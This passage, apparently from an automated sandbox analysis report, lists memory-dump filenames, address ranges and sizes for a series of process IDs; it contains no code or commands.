                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-332-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-324-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-333-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-335-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-336-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-337-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-330-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-338-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-342-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-340-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5252-339-0x00000000037B0000-0x00000000037B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5252-343-0x0000000003910000-0x0000000003911000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5252-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5252-319-0x00000000006E0000-0x00000000006E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5260-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5300-356-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5352-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5404-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5484-334-0x0000000000400000-0x00000000004BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                  760KB

                                                                                                                                                                                                                                                                                                                                                                                                • memory/5484-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5612-341-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5656-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5684-346-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5700-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5712-347-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5948-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/5948-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6020-349-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6108-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6148-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6160-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6184-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6220-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6236-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6268-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6312-366-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6356-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6392-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                • memory/6440-369-0x0000000000000000-mapping.dmp